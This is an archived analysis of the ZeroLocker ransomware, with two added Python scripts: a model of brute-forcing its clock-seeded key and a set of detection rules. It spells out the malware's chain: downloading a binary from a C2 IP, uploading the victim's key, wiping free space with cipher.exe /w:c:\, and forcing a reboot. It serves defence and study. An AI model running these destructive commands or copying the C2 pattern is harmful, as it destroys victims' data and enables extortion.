Introduction to the ZeroLocker ransomware
By Kimberly
Archived: 2026-04-05 20:30:11 UTC

A new ransomware called ZeroLocker has surfaced. The files are encrypted with AES (*) encryption. Currently the threat is considered the most destructive ransomware we have seen to date. ZeroLocker does not only target data files; it encrypts ALL files on the hard drive, including executables, with AES encryption unless they are located in certain folders or are larger than 20 megabytes. The folders exempt from encryption are the ones containing the following keywords: Windows, WINDOWS, Program Files, ZeroLocker and Desktop. Encrypted files will have .encrypted appended to their filename.

ZeroLocker performs several outbound connections to 5.199.171.47, a VPS located in Sri Lanka. When the threat has finished encrypting the files, it runs the command C:\WINDOWS\SYSTEM32\CIPHER.EXE /W:C:\ in order to overwrite all deleted data on the hard drive. Doing so makes it impossible to use recovery tools to restore files.

The main issue with ZeroLocker resides in the fact that when it uploads the decryption key to the server, the C2 returns a 404 Not Found because the requested page doesn't exist on the server. Therefore the key isn't stored in any database or file for later recovery. The only way to recover the key would be to manually filter through the HTTP access logs, if they still exist. This coding mistake on the part of the developer essentially renders the encrypted computer completely useless, as the victim is unable to retrieve the decryption key even after paying the ransom.

ZeroLocker is considered very destructive, especially for companies that have custom software installed under normal paths. Currently the infection doesn't delete the Windows System Restore points, so files can be restored using a program like Shadow Explorer or Windows' built-in Previous Versions feature. This could change at any stage of course. Payment is only accepted in Bitcoins.
The initial ransom is $300; after 5 days the price increases to $600 and after 10 days the victim will have to pay $1000.

http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 1 of 10

Source: Bleeping Computer

The first instance of ZeroLocker was discovered on a French forum assisting people with malware removal on August 8, 2014.

ZeroLocker Overview of functions.

(*) The author didn't use AES encryption but used the RijndaelManaged class from the .NET Framework.

The random number generator is seeded with Environment.TickCount, a 32-bit signed integer containing the number of milliseconds that have elapsed since the computer was last started. The strength of the password is therefore less than 32 bits.

Upon execution the threat will:

1. Create a folder called C:\ZeroLocker
2. Perform the following outbound connection and save the binary as C:\ZeroLocker\ZERORESCUE.EXE
   GET /patriote/sansviolence
3. Create a corresponding registry entry so that ZERORESCUE.EXE runs each time the computer starts.
4. Retrieve the Bitcoin address used to pay the ransom and save it as C:\ZeroLocker\ADDRESS.DAT
   GET /zConfig/171386
   1CkwfDadjXPhp3XrUU5J8hQhUtbecH7t1N
5. Upload the decryption key to the server. The request returns a 404.
   GET /zImprimer/[ID based upon MAC-ADDRESS]-[PASSWORD]-[BITCOIN ADDRESS]
6. Encrypt the files on the hard drive. For each encrypted file the original file is deleted.
7. Perform the following outbound connection and save the response as C:\ZeroLocker\LOG.DAT
   GET /enc/1
8. Launch an instance of C:\WINDOWS\SYSTEM32\CIPHER.EXE with the following command line parameters:
   cipher.exe" /w:c:\
9. Reboot the compromised computer using the following command:
   c:\windows\system32\shutdown.exe" /r /t 0 /f
10. Upon reboot the ransom notice is displayed via C:\ZeroLocker\ZERORESCUE.EXE. Clicking the "Decrypt Files" button opens an internet connection to the VPS. Unfortunately the request returns a 404, rendering decryption impossible even after paying the ransom. A message informs the victim that the payment hasn't been received or processed yet and to try again later, as it takes up to 24h to activate the key.
   GET /[ID based upon MAC-ADDRESS]/key

Global overview.

ID based upon MAC-ADDRESS.

Samples Analysed

At the time of the analysis on August 18, 2014 we were aware of the following MD5 hashes:
bd0a3c308a6d3372817a474b7c653097: TimeDateStamp: Tue Aug 05 14:27:06 2014
3772a3deeb781803a907ed36ee10681d: TimeDateStamp: Wed Aug 06 11:01:48 2014

Both samples contain the following compile leftovers:
c:\users\george\desktop\projects\zerolocker\testing stuff\testing stuff\obj\debug\task manager.pdb

The actor behind ZeroLocker is also associated with several Bitcoin miners.
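The TickCount seeding noted in the overview is what makes the key recoverable in principle even though the C2 never stored it. The following Python script is an added illustration written for this page, not code from the report or from the malware: it models a password generator that is a pure function of a 32-bit tick count and shows that a victim holding one encrypted executable (whose plaintext starts with the DOS stub bytes) can search the seed space bounded by the machine's uptime instead of the 2^128 keys AES offers. The password generator (Python's random.Random standing in for .NET's System.Random), the keystream cipher standing in for RijndaelManaged, the 16-character alphabet, the sample header bytes and the sample tick count are all assumptions; the sample's real routine is not reproduced.

```python
"""Why a PRNG seeded from a 32-bit tick count is not a key.

Added illustration for this page; it does not reproduce ZeroLocker's code.
The password generator and the cipher below are stand-ins (assumptions),
chosen so the example runs on the Python standard library alone.
"""
import hashlib
import random
from typing import Optional

# Environment.TickCount is a 32-bit signed integer: at most 2**31 positive
# values, and in practice bounded above by the host's uptime in milliseconds.
TICKCOUNT_BITS = 31
MS_PER_DAY = 24 * 60 * 60 * 1000

PASSWORD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"


def password_from_tickcount(tick_count: int, length: int = 16) -> str:
    """Stand-in for the sample's password generator (assumption).

    A deterministic PRNG (Python's random.Random in place of .NET's
    System.Random) is seeded with the tick count and used to pick characters.
    Whatever the PRNG, the password is a pure function of one 32-bit seed, so
    there are at most 2**32 distinct passwords.
    """
    rng = random.Random(tick_count)
    return "".join(rng.choice(PASSWORD_ALPHABET) for _ in range(length))


def keystream_cipher(password: str, data: bytes) -> bytes:
    """Toy keystream cipher standing in for RijndaelManaged (NOT AES).

    Keystream block i = SHA-256(password || i). XOR is its own inverse, so the
    same function encrypts and decrypts. Used only so the example is
    self-contained; the weakness shown is in the seed, not the cipher.
    """
    out = bytearray()
    block = 0
    while len(out) < len(data):
        out.extend(hashlib.sha256(password.encode() + block.to_bytes(4, "big")).digest())
        block += 1
    return bytes(a ^ b for a, b in zip(data, out))


def recover_tickcount(ciphertext: bytes, known_prefix: bytes,
                      max_uptime_ms: int) -> Optional[int]:
    """Known-plaintext search over the seed space.

    Every Windows executable starts with "MZ", and ZeroLocker encrypts
    executables too, so an encrypted .exe gives a known plaintext. Two bytes
    would allow false matches; the caller passes a longer DOS stub prefix.
    The search space is the uptime window, not the 2**128 keys of AES.
    """
    head = ciphertext[:len(known_prefix)]
    for tick in range(max_uptime_ms + 1):
        if keystream_cipher(password_from_tickcount(tick), head) == known_prefix:
            return tick
    return None


def seed_space_ratio() -> float:
    """How many times smaller the seed space is than a 128-bit AES key space."""
    return 2 ** 128 / 2 ** TICKCOUNT_BITS


if __name__ == "__main__":
    # Constructed scenario: the machine had been up 6.5 seconds when the
    # (modelled) sample generated its password. The header bytes are a typical
    # DOS stub start, constructed for the example.
    real_tick = 6_500
    exe_header = b"MZ\x90\x00\x03\x00\x00\x00"
    encrypted = keystream_cipher(password_from_tickcount(real_tick), exe_header)
    found = recover_tickcount(encrypted, exe_header, max_uptime_ms=10_000)
    print(f"recovered tick count: {found}")
    print(f"a day of uptime is only {MS_PER_DAY:,} candidate seeds")
    print(f"AES-128 key space is 2**{seed_space_ratio().bit_length() - 1} times larger than the seed space")
```

The design point is that the bound on the search comes from the victim's environment (how long the machine had been up), which is why seeding a password generator from a clock is a weakness regardless of how strong the cipher behind it is. A real recovery tool would plug the sample's actual generator and RijndaelManaged parameters into the same loop.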
Source: http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html
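As an added example (not part of the report), the following Python script turns the ten-step chain described above into detection rules run over a constructed key="value" event log. The event format, the sample lines, the stage labels and the severities are assumptions; the indicator values (the C:\ZeroLocker staging folder, the VPS address, the URL paths, the .encrypted suffix, the ZERORESCUE.EXE Run entry and the cipher.exe and shutdown.exe command lines) are taken from the report.

```python
"""Detection rules for the ZeroLocker chain described in the report.

Added example for this page. The event format is a constructed key="value"
line format standing in for an EDR/Sysmon feed; only the indicator values
come from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators from the report.
C2_IP = "5.199.171.47"
C2_PATHS = ("/patriote/sansviolence", "/zConfig/", "/zImprimer/", "/enc/1")
STAGING_DIR = "c:\\zerolocker\\"
ENCRYPTED_SUFFIX = ".encrypted"
RUN_KEY_FRAGMENT = "currentversion\\run"


@dataclass
class Finding:
    stage: str      # step of the chain (numbering follows the report)
    severity: str   # "high" for steps that destroy data or recoverability
    line: str       # the raw event that matched


_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key="value" event line into a dict."""
    return dict(_KV.findall(line))


def classify(line: str) -> List[Finding]:
    ev = parse_event(line)
    kind = ev.get("type", "")
    hits: List[Finding] = []
    if kind == "process":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "").lower()
        # Step 8: cipher.exe /w: wipes free space and defeats undelete tools,
        # so this alone is worth an immediate alert.
        if image.endswith("cipher.exe") and "/w:" in cmd:
            hits.append(Finding("wipe free space (step 8)", "high", line))
        # Step 9: forced immediate reboot. Common in admin scripts, hence medium.
        elif image.endswith("shutdown.exe") and "/r" in cmd and "/f" in cmd:
            hits.append(Finding("forced reboot (step 9)", "medium", line))
    elif kind == "file":
        path = ev.get("path", "").lower()
        if path.startswith(STAGING_DIR):        # steps 1, 2, 4, 7
            hits.append(Finding("staging directory (steps 1, 2, 4, 7)", "medium", line))
        elif path.endswith(ENCRYPTED_SUFFIX):   # step 6
            hits.append(Finding("file encryption (step 6)", "high", line))
    elif kind == "network":
        path = ev.get("http_path", "")
        if ev.get("dest_ip") == C2_IP or any(path.startswith(p) for p in C2_PATHS):
            hits.append(Finding("C2 traffic (steps 2, 4, 5, 7, 10)", "high", line))
    elif kind == "registry":
        key = ev.get("key", "").lower()
        value = ev.get("value", "").lower()
        if RUN_KEY_FRAGMENT in key and "zerorescue.exe" in value:   # step 3
            hits.append(Finding("persistence (step 3)", "high", line))
    return hits


def scan(lines: List[str]) -> List[Finding]:
    return [f for line in lines for f in classify(line)]


def chain_verdict(findings: List[Finding]) -> bool:
    """True when at least two distinct stages of the chain were observed."""
    return len({f.stage for f in findings}) >= 2


# Constructed sample events (not real telemetry). The zImprimer path carries
# placeholder tokens; backslashes are doubled for Python string literals.
SAMPLE_LOG = [
    'ts="2014-08-18T10:00:01Z" type="file" action="create" path="C:\\ZeroLocker\\ZERORESCUE.EXE"',
    'ts="2014-08-18T10:00:02Z" type="network" dest_ip="5.199.171.47" dest_port="80" http_path="/patriote/sansviolence"',
    'ts="2014-08-18T10:00:03Z" type="registry" key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" value="C:\\ZeroLocker\\ZERORESCUE.EXE"',
    'ts="2014-08-18T10:00:04Z" type="network" dest_ip="5.199.171.47" dest_port="80" http_path="/zImprimer/ID-PASSWORD-BTC" status="404"',
    'ts="2014-08-18T10:00:05Z" type="file" action="rename" path="C:\\Users\\alice\\report.docx.encrypted"',
    'ts="2014-08-18T10:05:00Z" type="process" image="C:\\WINDOWS\\SYSTEM32\\CIPHER.EXE" cmdline="cipher.exe /w:c:\\"',
    'ts="2014-08-18T10:20:00Z" type="process" image="C:\\WINDOWS\\SYSTEM32\\shutdown.exe" cmdline="shutdown.exe /r /t 0 /f"',
    'ts="2014-08-18T10:20:01Z" type="process" image="C:\\Windows\\System32\\notepad.exe" cmdline="notepad.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.stage}: {f.line}")
    print("ZeroLocker chain observed:", chain_verdict(scan(SAMPLE_LOG)))
```

The rules are ordered by what a responder needs first: the cipher.exe /w: rule is the one to act on immediately, because once it finishes the recovery tools mentioned in the report are useless, whereas the staging-folder and reboot rules are corroboration that raises the verdict rather than alerts on their own.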